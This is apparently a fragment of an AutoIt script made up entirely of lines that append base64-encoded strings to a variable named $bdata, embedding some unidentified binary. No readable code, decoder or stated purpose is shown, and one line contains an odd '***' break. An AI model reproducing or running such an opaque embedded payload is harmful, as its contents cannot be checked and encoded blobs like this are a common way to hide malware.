	$bdata &= "ieeQPcNGbJR4XJRFRCVIgbnIsKK+LxOW024NFGfh/6hAFEbooajUoQSlyD/z6dqiy8z0wUfDh/3wQ84nIjXIhEiQb+D3UzTi8YAwzuIQvrLHaJMifMTYwZW1wLjnefSGJ1C0hUIbZpmq6bRfjOLHp5SjokIKV6KXjnaSkvQIlRCgjzkIkuL14vC30jnz6UVgsK8WbvCS8IvqI7RfwJfFBcBqIpekQNPQngVQb4ctG8iD2+7gk3jKBUPSQSiQrkEWfVCRgS8NGrJGqfqasyqPTCjXkePg7XMMAMbnjcYji80JY7EwCTSdyDQEWNQgQQJFYK/aJ8SbiyJRD4xZLu1AmX+FA1qR8EG5BWAl7KcgVyNmEDARaqIFKIaFbJbzMa4UHuwNlQu1HQG6d0ogoKo+iJIPMenmuY/XYsdSRoEkxa9BXeH0wVF3B3fADryr7DcKFgpNgPVKtfOKKRZjktURNWfWF+MYtKxhCx6L31vVX/dvyHbBCllj+"
	$bdata &= "VPhgUR8xefNpe/1Q5sMc3X1vxiS1dFYXvK7ETgMM7gINb92AND1MUJuC3IjlXiMM7goqAKVbdgBJHwNdEJD3kRdgNAADAAzCARQS8oO1CLXUkqukCwbPPvU5RAFloaTXsQ3iLjf8/oeOOCoSBqBqwH/LhtVWIA13/4IsPGc7jXel7RjVcFM/PzaCYqgqUiRWQiR2M6wTPz4k1iIk9hPQxsAw8rTNPDaRBgCgFfCg/zdMleC10nI+V9gkAbq2cDgSgGEZ85Y1FCKyLheD8WF8L98E0Fq74oTlfnCeQXLw+wQkEvhOU5mnhNN09vthkFQTcDJECl11pogF2lOFRGXOEmHWQJw9vSkAAdgEJBJ5gwLBONyND+CDjA0slBgReJoaFyC42sAzABQuj1VYJF1iE0FdYXU5qTxMzGYzg/pKUFd10O4bq+hCBLvt3vHYujTR2jVyzpl5IKXTAzW7qdcxohUM6fNj9ulIduRYZPOuwZGK8jQNak6FZ"
	$bdata &= "BL609kEEBuFMNrGtsPRYcXEl8MjDamgYtQE4CMEKCE+FgfCvXWgKQwlLAhWgd2H5/kwgKQg0MNY0BBgoUW9ig/XgSIvqTkbQj8Az0lD/0Vv5wUOHheqIwVlEFxaePzvJM9LmexJ2eFhmL7NRagYKlu3PbMspnC28ScGp39h6CAB/ZoE5TVp0Ghz/JU88A8GBOFAiEPAIKOPNqDB4GAsBg9k3cxDCBErID7dBFNbdwCG0CnEGdFcYGIbBwtB2HmGQLsahwWQJ7ED7cgyA0ME2dyhC+MPqpuYPzMxyIK9mX3hICM4BwASJZxOWMJCAaAJ1Rbas/rDMkm4tJ1BixWmOM/wI4kAknAjILZ4Bmgkhoy0TCl4AGMM7AZg94IsyLsTA14XUVgFBYxZx8YHMm6jpBuVsAco7pxroKDV4xN2LR1NJC6sNKPQEdEEA+ElvGorBdBTECIFjqlLn9DvVybH22gX2Bwh08uaUpHDl1h0IL57V3uOoLwjaC"
	$bdata &= "ycAdKDwbwI9TU9D4HQYPVErLQCdCfeDy+yR4Lm0vpEhuG+0dt9+DBsFGf8IuXhoSwETQVcQKlaBeMB/BNh/XnMImogwE44IWGsI4QnA8xJ+t9HeZS5+BTt3BHy+BPGV/8HgA5jIizEpB2AmwHcpbD8ogYmKaANHCYvusD4WAQR/SQxJOZGQwDkBeGiykC8lnggzkQ1ISJZd5h6xn7Oa69eeCJ6IY7MrxYNIBaUgrjHNMFvSBJYyaf8uAT6B+SAFkxl0EA4hErJPUwgidRdAWCTpdc4Re0qJiB1OSxLIAksIHhhYKpDtKidDRxQvAr9IDIAc+tUUfKoLGB2eUi6IQPwOFnVRijhFDPHqwsDsyy39ARPosIHZA8ZLfLBUcEqpizRIDNhpqNRuIi/AOziZPO1xAmACzhDmbwmmBwx+U1zLFjScRhyQUEikTYZwfjOQBGvBDDpkVAVrGr+8iwY1n0E9LCDONBsKxr2prUsMXn/c6wSQYUV/HQ"
	$bdata &= "L4ajsHfLHGih7KFYgHumKSgw3KDbuU/8/SsSQ6EcpSy4AzGODgCXRXkQ9TiXcsdHkI9glhpNn+ZOSAuiEYiMxwotxog5cwpkXENzEsMgWFJ8DYLYhTfpfbG4zQN4mw4QRwdHYQ2DYpLwMG81Ee6p8hdI3GU/pXrcE9Vj+ufd1v3pe1IItNFg9VzxzRgzHqOIF++U8R1l7oIF4QcOA8E22gF6xGDHMYynRQjA0UNhh+QER/OxyCqjHV0IiQBgfP7Nmy1GDkIdTCcGg7BwwQe6ELGrIGtlsup8FghZEj0olHbvlXYC64MXVZt9TT0HG+FC2cPkKDftFHHyQMPZsOPZlFGH70Bz2XJIN9vnQHl+CmEDDCrVTGIL4pcAuY8hgyH9az+lF5Howd0NpV5HBI+zElDLY5OFEIEGtw005PJgh1DPeFgCQJPwZKPLiOeARfALBOSAxyFlOoCIbLxAC0Yplr2ZdIBVMkwFDyDeFcE0gh4RYHEGlA7Pv"
	$bdata &= "zS7Ifz7ROBo64MIC1N1E44jKEH3RIj9zsDMmqmdRZVgb0Cw29g38UBKitgFQ3viTHKWRdRZycOVeMzN1rj3d0YZF0VIhLkUx77IIZUKHrOW8pSxjBgBzPBKyq8Tj2B5RYvm4***5W60kJNkY1mg428zgsf+2jq3lQ8oddMmW9wBDrCuQk5vhQaFwRDJEUnz0O1u26ybbRSHSgAUX8H0h1NGoBA3dif12McdhT++sYM1KwCBAvMU4HgrzbLBB7QHcuAre4UNZNPRhP1lQDB+iumVIOIIuP/zcLh4nX0VbrwsXALdyT9EAuzAOhedtdSwyLtTUoVFEG7QSMeVhds/TGxI+ingOr2giwfJe71YA/G40VE3ICA/Irq201glzbI8eksAZZBUE4QWQF/5ZEMLQkJz0XIhiCMmNyy9oAdtUwufvBIvztPDsyc1tTOzd8R55/QppPBFApFhCIwTLhQEEx/5sEHI5+Ko1Y8PYDwsCN7kB1Ivj8imlw"
	$bdata &= "M6zJXeHOBh3Gylvmssdyp/uThQWsqtzwNoAKwhhSvRZwYa4+jt9JkpKQKQgUbUIDoa7YyK3KLNiqrr/jOT6qywK9zGbV77vlHCkBALZMVQCIEvsLMKe9QZwQfBIGcA3KDamIzsaGrCQrH8WwdQjiyACTnISt+7VtGB519HUm3SDbbXMX19cL01PVvBfkyJSJACMV6K3ZOEz+sB+0c3EzcCl8XI4ffh0+CYElsloo04AJWgx9JUkSDUYDOqp48i7jQY4yDLCHe20q8QwJxggAsL0JdXo/nWzMDCJcoijUKwJ/hDREDogBdH7w0uM4ZQFxD4bmfCKwsk4R+Ioej3FtYnPwuDJTYAgIlxaCn4AxONk7inom3MR/fCZlrGBbCvt+bNRCmu+UcHxeI+x+I/92A1MFM/Go9O4vGtu2u4n/4MMEOUR/3RTog4jZ444n+OhAvuso6V30wDi2wmF14PMelzvOSPUI8O4vWQcfXrwPkIDQfLQNiwqub"
	$bdata &= "R7/LK4HBwQaZwfwH/1Gn9DuD4KcI38cJpEvXTwgFDmZdbBgUeEJAzokAK+VY6gLVgwQRwMGCksk3NiEB05+Sww5psEpN/C3+Mh7lQGawXYmQ8ocJadE86B6+FOpuU0gEbBUKglDuMbFYmv+jRcQrhTByZ8fb0mvw0WaF1XSUYO+8bt7djvL+Af813Qagfom+BKLECPWktAyFqIK9kQpuP4Rg/ZBBGbcCT4FvJx74OyEFBzafaxQ62pEsxPtvdaBmCGgclgm/o7/dFI5OXUyg3nociw5WRR2Jy2n9YD6UgieIR8UOJbeVuEcUHtgoISU2usfL+C+JS00JNa6PzpS5sALAV2BwAMjAWfPQHhYUqBAwGRuB7fbBR4F35Y06Vkv04WAfCG1l7a8EpbguBa0nyA0eyltaAiVACt0OwVozWjBCOrZPo9BE0KtvFWMVEAWQguWW3aLCVxk0AjdXSZcJOI3hesjdd4Cfq/HUUNdWScQQWBkl+j82i"
	$bdata &= "XhC9bpJO/AvTZKWlcafyJ/lUqlM+QJIDBAUPgBVypgcI2/4El10M6n0BBkjq0QzbRWtra6+gXdClDI5w8NhVA8BhzCK9GD4n+UJjXEle4SK8pRv4DpL+yMCOIqgkUDRRArgCPpTSR4+PdUfwv886o26y733wCw8C2AzipNCPDwDmq3loTNhCvQdpckLDhNzwwd5j5A4IOg9oGjFXpaQi5I8RA+E7ap0NyogkIroFRYhRLaGTiIJcHP47nScLBZIuNCuENC8HoWqBBt6IqCgLG4ThL4NuD+CkaZcfe/JfDIAmapDAEeRpWhzaM6LM6n7IFbAwG8DBdA9NaPuuIN2wVVzvotIYWNyhToFPEhmAECY8wUsp4WPui6ykajSCQySeDshIb4TgR+HVd0DUDXPiTUTeYg3n0ZWjxieaD6GzFULaEI/kLB747ST8ICBQMEX9PSEEP9BHt0GVC4NFM3VHHD+wLCI8LVdCXqirbA20ZDiO4WNItkJPY"
	$bdata &= "s3ch0CS4Djg1LaANEwVLCfUNXGFSYQII22XQ0AkpTY4RiWAF+bZ4G6y2KhkwSG9INYdHsckMfzQ3hwBOVKojPsD9QOwh6MZF/0+Tzk4a6MAj+eAKSWfmc9AEAAgQCcQNcU/S9H/+1CB0C9TZpnKxW1DRNTQHEBOjAbTRN0+DEsLwpsdHlUXzQ+Y4QOi6HVoGomuM0gs2kDcsHkqGC7tBcgKRP0sdRqHeQdBekudk2/5Qb/igOKL0xSk0jAqkY2kf69o12KzOVUu5cpdKnOQKAIjveF4UfEw+KEzPo0d60AvDMBNisiFXnLu4kNFCxkEOcSvj/buoPjOAaisIsIDxYdxEPvtK1ChSygOS4uA+q4LeZxJJmKITBJNhqByS+2LgABFk7rIwPh3oHsEDQ3NnL/OD/h/Ph0r6IwNHobSbxLF04nrY+11yT+AwtIB8SGmd2QgDKgHIkT2Yug7wQBAGBDIfjZdjEoSkCgPpU5sAh/WLHBLiLf/w7"
	$bdata &= "wOLdubU4jfBqf/ddwEmAWa2hVMAsCvLKkMcemYtwKQSDHQRLcyDgroj2sIDcfeBtSXRGCNctmd9odBJsdBWmeGpf0dkHS8zHRztsjkMj1Bk2BIfZsnUQESDf37VpDDw22oB7ATR1EUNdBd/lO8hFCDwzNTJlkkUiPrepYzVktOQ8aTSV5tkO/QVv9XXtPE2lqXjlWN2JbYYObMycoMJQHXegHe120vKKReemGcGTo0jyjSLfHMXaaXdDhMDGaMExf3UysR348I9yF+sVX2jaChxTq2JankF9mHjPdBBABggiTmE2C210gMKIAdxB4uDU6ECMjV3s4aI8KbHSp9GgMiTex1JEE/XyReAGyA/A6Ns/NAsKdXfOFetsIYRTgJEHJqDg7BZjSI7seD0QCDAhklKFDphQCOQ43pbZWpvYqdPEp9y+vAHAfBAcyfNQJjkCkYkL61BdKmTXhnVgN51un3QnjUuYKLj8PQUDPr/X2FehMGsbG21qq"
	$bdata &= "LAlDYpKiD549wwB+1Pm0srUfUbbwpw7xpUuNBnOruzOorksvyElXCAm3HQRGeCeToE3yh1TDngfxtN1wFCHJ6jLpWn0cIZ0ZQx4OwSFEGcPjqA0Y4e53RBpdFkIbnQfHIXOtDhoRwTagC4IQ0k9SPQ/f8lm60CLN+eYViwQq94r1NQDVTQJZrtDSGr6bAUODM+ixQLD+SV7lAorCdgIDBRuD4kMvZKAQx9X4aY7rGi1LHUOFmd1R6an7aUw4D45EH4DaoGujbv1raNyLeiBxl3czNG5jwWvAlVArHQKgbohAfOYi9jdUKbeeFn2riqMGqsugI2EfeqI8AZqjAY0eBiYyY9EJ5pTUgfduFgNIaBeRIHndT96GbEa3HUVc1MF1wjyS8RM51IZ+CXXHkw9wDstdQuGB0dnYZdDUlO+xxOUHR1fnOB2tOshjHN0cPQAh5f9hOP8j1lp5xh+mbQnAPcQQMlYCQntii4EwsgwLHRn61jJMMQCq6"
	$bdata &= "gWZ7YeqBDCRC40l1MgMKQIQI0WOHprBlD26wQNmWTDPtzrECgUdAMU6cf/znw8HnQYO9Z/FHzIcw4ghI0qZNI+iP8/lH58acpM0ZBEnCiguPgOAjEUrxZ9CS8R8KG4qjj3B0GLxwvDa61+MNzEjbWsGEG4Fab/yjp/BjEUNBa4woyZUuwdEjGQ4IwwaGYNTf45Jpi0vHoDsO/ubxiIDk7rzI2FcyvGRvMCqN6GihzAxEzrb6qz9M6AOTB0FATGATBAuNvU9+sySWYiBkCadfQrkaHapPQK6x9lwLpLQx0QSXgFRfUMGwV3oIqwsFAJWz3EFCV/9gerPAGKpC3rEqgTK+sIqAJ07wl8nQvyxMtdwCtdEMtYtNgExCCGBMQgTHISTKgBRF6vpe9z52g3xGgnjU3IwdJOCFHAUxo2DAQVhF0zTFIwNlkEvERfUsL4EMB+TZrUJeEBg7dKmHUaxBCGAuwie7r+TJBGUEZRdR85IhR/e65rzJD"
	$bdata &= "HjUfNlJgAWXXB6xN3UApNssxqNHTlwRW+zDVZHHwDdE1gHEggrPqarFjQPhPzZRpZwriKFx0CEEis51RNLfzGgoya1Irmw3pCHJAp9RbCjKeMI14F0IuNjGx/XpcZ+AEABMViBsPJe55n8+TEM211rDYSDLDGpMFSTG+YsWyIexB9v1MQp2YPbwYGThA8c+PzCFYgXjCVT1efz3fzX29mQAhuUHZgfnB/nqcbvGdvd39wjbY32t04yaPg+M9nYwldHGwj8IKuBc7DihwiLqaGyivKQik8COQNAYvRDiy10G5K+OR/g/SPgnTxdBMr8ZNbBL7xy7BvQh8Q9l93nuAD0yu0JoQWDOwDJMbw+OyAONDX8EDzpCBTaLskNDI1wMEQlOQzWrhhE+Q26iAK1QK4evUr0lKM4eWBMsw36xptgdnWaiLpAuBeeaCU3gOp0MX0E5loQfuJbqiyLHu3TdahCkAwffZ1BvYQsAK1SwNMHBQ8GHoNIt5q"
	$bdata &= "Ak8C+BEIaPYR5nQceVlgljTKsyyNE4/WXzs2i8aJWjiHtbSF/wtZxsg6yFDI0gY+CYShU2ntoj6zegBf2Y8B8gIb6M5rxhJZU2GHIcV1YJLWTz/ryZut5bNxHJmB4UICpEwxBELIC48ra79Qn/h8QbVjDSQOJ80ag8pa++sPteEjaxXUznFJuf2nhYfBeXQeqAjwn2hcWnYNgWYM9/sAmYCBTHz4TSKn0R7TyD+A0JNjIMwUXnUH2JTIAZnsCDxkOL6GuLVUxoE/rMqozQW8IBtYJFaJEfjFnCkxBWoaWBtRu0Msua/rBXWJDAcEM4QClmIBIfvb+SrWSHzqav5eQykpsdXU+h9hobbi2ksMB1YGBUejvsYhW8a7Z9J8QnnUOHzOA3oMGZ0e1oBQB1jqyODAPrwONhzYDtbRBbdfGc0ioCJW1ih3jCOLRUDOKxO0UaLGwp1zgU4MqrYSGe9og8YgVo27MoHnBRR9FolOpC57oc6BSFcZC"
	$bdata &= "A5eZkvea1vZgP4tMiAePc8XgWAMbAMAV2grXomTcexknmt0GbSDbff5FJd9El0tU4SFlGlbnMWjEaUVJtFi4YV+i8QvqJr3pAdM3nh7Q6l0KrUUAXl1CSMB1jAUQvXiAvFQ2kgDxWne0JGihB+r7GKqf86CdU9LcbipUeguVpsLcgwV+laNPJMHPjq0v8mFQAQkgjyOB/kgAMSAovwAcQXJH0wMOpLAIEsYgG5MbQ5OBDMO6xObsIdfkRCgCVQ94AOAjmNh6HgBRlg8sFiKqpWk3qPkf7n6APDXJsTzgDUp5QBwJwVtFQBW0VdrigBc1yWjVw3gMlxWKKj6SmtNgIujaoH6wYA7CglQO9PQziops5QJBeIPdhD1b/iWvDccJALA0PiIRf5xAFOlWEiquEjSw0Qj+MJqYSS0SETi/oztPfgS3wTS1zHWIb2qqSXB6zTAiIu0UNHonk0QciQBY7wBekc0VKcGtJJ6Jml46SWTOggkfqDWsr"
	$bdata &= "ZzU+4toBKgXkTbR5Y5rGhoVA4sHgPOCv8XAMhIdHSKSQWA+Qp0bBm37Ss+Z4gIMED/2jhd/ntrbQYtxmwFOk4sikwOJVHyPkilQz6Aff4BUgJSqVw+JQp1JCYZFJLxyAtKAyYKUxQ1grQu0A07Ba18NAYvrnxtFmSNA5FCjHGcNmAHYGqWpVho7CcHAS5EBkA4f+ZJdjQB7gIPhBa2WmMQvgqAOfYSFxIFkAhggCD7wJN4K4Tcw5obHQBUJvTQUkKz1UUQ5hp9OPw/cTwNdAyIA0NBtFjUeALQYOheSOQX3z0EIZQgCkEzxgMK63XByNYP7utt/10kgnYsTgEK/2+0At4iaxJFbmAAsYLC/hVaUuq4Ugq5xIXErYwNIopN//4F6yVC0LcaxHUGMaBvEQob1AJHNF/cFiCeBEP65g+CRzKYwH7w6xV8+0DHEAOBk5qOdg0sFG4OngHDhf8IOSiHzkuKC4TJJgXw4HgGQ7LVSID0/X4a1Mn"
	$bdata &= "rJH8T+HIOS9sFC7weC0CAuYhY6IoTHMoPWyIIyr6J8t4p6bmXKnoadQQD2KkdDoU+YSRDkAKOZhtMOnwJcCiIlqTaw74lIAN1GyZDK1oSirCCjIuzvitxtJbI9phOKvRiCgcijv3FAXigUN6EdTRJGn0QS03s/15whRAaYtciqDcKBkbUjB3whIkH4MnIF8/H72aBA42JTBYw68YqDmYSvomOgy0AkxCOOx+fYzLYEjaX8EoJyAtDQ0C2qp4wvszWvDn+EqQ7wPtzIY1IAquABDp7jm6TWAoARbqT1rWDKEdIc0cCVwL4WhIqTS5UDNLjq3BY+K+gDQBd+KbJPJ0R+SVyBuTHrMfrKX0HV4N//hzHZbaHB0OHGmoqza8Yiw+NdA4GDgjAwlpKfwNKLK0n6DGoVX03agVeDc0AmjYXtzB7MFDRR3kCbT9oxCYQS+wrQB6AdPUg2Bb4y1GJ8V4byUGu2cIVgzhtsFVbRyU3FpsQcAzi0WiL"
	$bdata &= "D0rYKKeOVdgcsss6JWpU+HpAu1TICMScgHMC+Algnl5WE04AcqO0WhvBE8CjoXuNiOkEcGCATimTs21iUFYMJAAGJQrtChwK9N7iDWGBwZogFcJVTtNMzq7rIbPW+dCp8hUFTLiBOOS44CsLA5r/+HzARkoBntLrUosBpBipok2NAA8OyAy1jZAHJljBJ2KbgGAkgAna/RED73LWRjk9c3ymzsIzQEoTbBwS6rQUbYQImvBzBcZWUYoDDEtYwgEmpgCMah4PWDzwBQYBlsVJAG5Oy3EoYIhGBKdTCN0XAslqridKruDsVAQrELCTknyT0vODRw9RrzWBbwv+tP8QjMwEgOtyxpKBG4W/bS5q9ljGw0imeElAKfU/aJ3QhqDRdEOCP/MCPoJXNzSJPmGKADMMZQJ10oNTwWvJBBQIK3Q3IrTAYme0T8cG2TT7A76LTyAn/7mvfIMZqCLMEZsgFGoAE/ExdKBkd5AxjYeAO1N6DRq/Co1HC"
	$bdata &= "HgwhUOAssc4mWLoP5n4cuL/Ns0EnBBuhmp8vl+/MYlGoS3I+1MepCxAYxI9zHplGLOIB5ggy02l/fvqAaQRx7kbZUoQZqgRMHoPQIZB62Db8ImqRSCzAeQQyNqy2/Z5WyOVEIDbsXIgw22rXcdhOEFcGPyBeCXC3vJGZvZNq6NmQWL92BIOh3D0QBsAndje1rqtL/gMAOy27SZVtdtaDF1+k5obMl+M62LB5gKbDR293xYtBA5jA8boRjv8RvSG8vI/PXUTBWQfIgxlwWPQDiiGJgQGB5GWBmfvPAbExCIc9K6BZ1MU4jW83QQIiR8IHINPEF3dJ9CGlIT4HycPGko85C2kXoDQCDNZugjISJmAl6J1BPKEUnmnChIWCBFhC+MAzL0J8FUBhlmUuEDGjZaQXR8MT8keA/gQqwBl/f8xAAjGigwYiAtDTXX3jY4dwf5nQaMIihQBiBFBTiafJvAJW+r7G3hLKgXgUxVCSapWhGsM7UokXL"
	$bdata &= "99ZdSIXwzg4IQFmHxALvSKRYqEsSz87sDGhR8gdCuNXYu5DVwJqQMCFivBQtRuATKUDTVqII2GwBDlQ1F1PHvtsU52DMqYyFDagXCmYE5qKtcbvRPTgC4qAs49zU3hHVdiU5lEdgUsuUEB30m3LIewTrz/R4AwxtgOgEwGHRCKjKVyc7kFp8IkAnQVIO8Dyj6KiIwWKgjGhBGuqPsHvcHrTY2GGrqfXwQ8MObJKahVgI2EDq4gqXcrA9CNWioZdwwnjMDTuA7RaIIc/1Ra+iAOIOogiBDr5h0uhNRWQfTFi427X+JSbAJJHCkUzizfeqBZkNpSxPihGUdw9MEQNu5/bHZ3aCnHpLN9IKc4TbdijUTM5IUNXIqiNproMsXSVqP+Vprde7e3SYlHaItbbFWoyLP1KW/f2euOqA1jpbUYMkuNPxouctQWvHUeXNA4D+YWvGHdTi5E+EU8UP11Escw7YtFhOvbLPwwQLBi67QEOevELyDoJkj"
	$bdata &= "MlyAaKKzFQ+pL4oeugRVm/AiOYCOoU8PfX1viJguf3MaojiDbsFcJAVxvDIowPfB2jQp+FHLngcb9o2boFjiaOpfpWh4A6Xo9QYjvSCJonMrnoyUkKdkoluEf3lYMwgjgMwyA/gt6YlXo4nMMD4b4lj7B9cXupGRQde/pSxTW8pseuNFIgv/OQuHbwM+txY3ujGvJMGEcfErCsW7A1p4lfMoqikaAKGg+BOj798PA62DgioA4rAhEOx2aAUd0AVBpxuoSRkaASoVFoWbRZurA9X0N8n3gBIBy6f6Dg5LQLly9QVmAS5Qi+P93U4buEI2JjrRaZosxQWaJMEFAQEpNuAoCJPNFwNRFr2TgjIYDHQQaB+I93Pa2fjb4DW5HvHAeuf7BCAhASXX5KumeilqppLAO4DBE1PwYexU2i1frsjk1r25i/otFg9OGgewU0UJYKsBs9QMSbmASAQ7rYnGLX2jKyaiAWWmwO874VyACeNoQurNAKEa5"
	$bdata &= "APjTgegAi/vzpaDgSmL0oYRcliBIQC0CMTUYz2+iaCeRaTWJlmg9K04dryadXmi4PQ+PBWrB/9fmcAI59mQKCKsFF+TdXQuCweEksMyUKk2lDgjQDNR2CfihyNT4BcqLTGrpNhjMtgxFLNpi/C2+6DM97X0NikwYHIicB1BG2tmgMOkARhhcbXZeuTfaqOb/RxfB1RFtE3dxHalSAHIn+H+ghUf145brMHnrJdWIzDZfgftrU/OUK4VxBJOtLgyjE0dUdv2uTSj/IOI1WccFSYwtjREaTYa89oOnlmtXdG8e4DB0aCYZab+dsCJ0XjkodVoauBe5wp3gE1f/tms4BVorzJxCmkC0WesYRrq35p8vFXHARGVGT3tAGsQtK4dhewGnIMzfK8clNIK0tdAbmMAPrIjPBL7U6YjPQP/CBgcWqCt1DzRYW/83j98JbOdMflBbgX/4HByK8+yodBFc/AsJOW+LKYkCcBJQLZABFxDeS3XJ70aOG"
	$bdata &= "5zxf1fVy8DD2sprQK4dFgtoGbQjf5BkwBpeUF2Be/8/CTYy49uLAy+De/wcNB8497QfwxBNddh01AWZJgRXGToLGX8cQYCSCRNMEDMsPSkSfgioCb1KMwob2BgrkihX0eUtUI7US/wbVrWp5SNUHlmL3LAjAQIYpLKoXyaZCX3g8EZwdMCEs+Yig34cLXBshzFgHDIMjXQI+CwphyTmP6ykPnBD5ufrwTPJaxgGyE0USOAjauUW/AUdiL94OFNT5D3QwliinNz7U4WQROweWP6JPUvrFQU54QtxeHUKAYwFBgyZgH4iEO1Gqf7eSTgYWED8YeIOuvaDyaorwUg7ow5sMgHc7l7pFMCg7vyrZxDwBE6jV4XLAFQAugGLIKChZsJK6LpcIHApoLfhLNAkgLWAAdqwQcnqJ4oExaVfKhBotdZdIH5D5M9rC1H3N41EP7FkSC7Dw5qCujL6A5bY9EpiLdGgPUKSswJvBucB1yKE4oEygcM1Jy"
	$bdata &= "JBFFMYgoMOyOLMQO2WBE7BZQR0KZQcjbP9MrVNEI+nt4XAjpFxzOCQSX7pGTvLfkU5FtgE5Z979DvzdGrHBkjrGrsyFSCBv1DF2svEQVLHhbAtGAwiHmp1BAbrBoGgg0sRUbCbvi2Y4SgCGp+fghDvdhGgFuopPGWwg3I+lTkqFitKIFhTaUw9Vk1b2r0n6SRK+W47AEZAgzQC2/SQ6E7pLBTcVWMXHz4Yqeh01J+Mw1deF4ZQLTX4jPZgfj1/MAxusOB3OMgr/Dv7dN0NhJDLxwfHNQ6M591QtAxXoSCxF28YV7n04/Qg8Uh4JVH4BJaC11BGIGDsIk4wjkwsYBnuQJgjfFXqM1iNFMuhXgLgBA+UEsTDlorA6PAGnnEBYhSfbuAbQOKQOVDAaaGvFCizmwgwBX7m86YSNwCTlUyNSldLOqhk6kZHQnEmKplD2hlE6gBhgzhGqAHlUwfqFZXr3SI4PII1Ditr61UwGUgcikgNkzhBxcD"
	$bdata &= "q2BA0DAYwcBpYFkkbdTXhXe5FwiIHTBw1IQZH3AQKAQpcrNIr8CJricKCuV+/ROlqGVxWihFfJ/T/aoTSdG+KcQGE9tj3MhSKi/ErGOI6wnQXaA2KhqJCswYZCuLzOCv/P6s0wyXGdemNfv+KYQKE5HQoAjqfG/j9xHW+ikEDahiKZjogdN/6DeDZ66tibIrwWJKFiHPBGBj2qAYYOwv2QWIGGHiFh6mcSQR4C07gGTeYAv8BRgy4LeAjgVFJWdURic/NBsP/Bl+0LICGQBPCok0MYuJ9TFE+/459WORkiuTnXl2knFQmQA6YsKyRopCH9kBjoh0xVbgEoFslI0tmCAi9oaYNt0I0Jt70MVzKgOnk+Vh3DVmrMC9hnMBAuMYJHlSzoZ9kIOBqCM5efIXESpK4m2pqB51iQkx4c/Zd9QL0hqp+X5gxYZqmBMDE6HaL+Gfk9fI8KyvGdB4pXguiehHlOIIJWDlyYuJLc/Xy9fIxsQxb71sp"
	$bdata &= "AnOUnJIHhf/18iXHzLiEwIUd5CGNiXWt9fIDcyWn9fJ3TXCKieX3gnX/lCzDhuDKdxARICLsVEx1b8NdE2OHYnVv3TWMjIwUdAT89OyvwIyM5NzkuAa8CWOiSYSkfw7JL4p5tA+Eu/Xy8pxUTnTprFtIcnJyQUuMD8TEiYp7lA+N5IAckMTyy/jT2QwlJ/jkr4X/maRyAvStNGMKGQoZmZiTwLPy9NqFwC8cKCZ+xyh79NePYuJZSxF99NecnFQqgHLlnlWk8oxVG8n8TMmJiXX0IdApOTKEmPXfctn8m0ED/otH+ItX/PPlSE0gF3I/LqAmmZhwsHmUXtJMMfG3d6SM4XGRXJQb2z0WyDF4pErJKWLiPXn0VJjoLeLx0sOcUjkZmXF15VqcckoqQ8uc8mPyOUAytIXShcDkqJAH9QWU5JAp5JxNQiYKQJ0zSfQAD5AjP3KFyXXzhf+FyRwFyCGYlGdILqmUiIg5ILmQiJSgxMkzUqCgt"
	$bdata &= "CHAAeTFbe4o7Tkdm+nCHrjYjLgH6PkxsUKY9t2PbaOMFSjwHgbuz7N5noOg7e8nMGdVMct4NmGf5coJ5Pf09wj4BJCW8bx394iQCBgGRGheJSdgn/f09/TnvbdChwzrBtie53me0MjAuLCobQHMMp/Yi8bzPIP/6QYMGCwgr4pZn/mQ3tkh5PlA+JRDkJAWpKJZxvMGyPCfCHkBcvmQ+ZCe5723twxEBkxUXDKe53lkbHSHz2EBzJ9HCqCzjOd5Bqi4zJ9KwwoAPzOEBg5EkRRlPDJIEAzIi1yhgR+DndHp0duRQSqVpsnzGBRtGZGREAwFBp7kk43aDF8D0iEITQVerElciCwK6wxGtl17LgUO4PE5eAV6E7gcAkZGZbwewmBixwnyiglEB5pNBTIQwYqECExS0UA46IUksZogxuFFmSzrJghSWsC1/7oelpESihI6ymhALipBt+ZGCkAMdDbryuz/Ye1ldAwIRTPvi9BIgDgwdPqLjv"
	$bdata &= "8vvf3/U4oYOhlbdQFIigpAQkCICHX21ukzcWD/2e683Bh2WL1tr3olWhrylBssdGDUh1d0GaDLMBJhpk7C0jaHMur86xEwCMAeCeH5STBhMxhQcuEQBwCcKggk+6sFNMnkFnRVkni19FBWA/evEF4GXvsxxfpUWVkbxVk8LHVMu1e2vthDDUk8UzRVDFIhiTPR2JDECM9N/VMI2BYTGHbQCAx+NDAIQwOhCaXPDmVgCYci67qAzhpBnd4kFDZOSobShIga/DO1ZDot9PgDy4vBk7KZwJ+EHj8ti8ktCVeexgMtJqJLLV2Ofrq8CB7aSpTY9gSA//VFKYraAPDQGHAwWZeoA+JipKhvQUOCqQUr3gNdISDwoTKdPFOtctQDU7p0De1gJbHQW1CNTlEo3Wi6xgZFfEbavgpovS7eSHkF99gmLUbmIvAFSHwKmWpkSpYUnFTei8IeCgoAKvZhMnApmlSKRJUECDiUAwwbqI2MUFGdSwXCyhh"
	$bdata &= "O9w4hYMgs8VInAacw+lZGMvCDn9QXUwPBizDwYRdoTEOXCaVmGO3rFLWziW9BduEfZMAx+poRFC5ihw+sfdSvK8FClil3hvPQEK0Q27ewJy45wDUev6EKVMjKX59Qq9BEtQgE2BmnLzNay9QmJMd+akCtH8vrwOEnKE0k9f1Y7JjTMBkkr6KBBQxa1OJR+EgzlDCCpZaheIXc6qCDBBMMyyvLj1VND93oUeY3l+TGBQGxOX0QKlTES8LAC9haAKVGUjrREwf8TBuNJwScFLr/ogw/DEAjyppCmSGs3IWQnwT4VAo3ngT4axqfpnT+2YsIiHGNXgJMlP4mZhHnLhn/wsicpThTSkiImsc1GgmwugRTBjDxHx45OrxqZbL+yCTgBHjL+KE0RPdMMyF32rp0TEOZM4iIv4Dh4IDBcIjOIpFdYUmioXciC8h0NnBO6Z1eo0qbG2oCkEhGcUhiI+nj4P+Y4O5/ksMnM9ILwXUhWDzmMLPxrkjm"
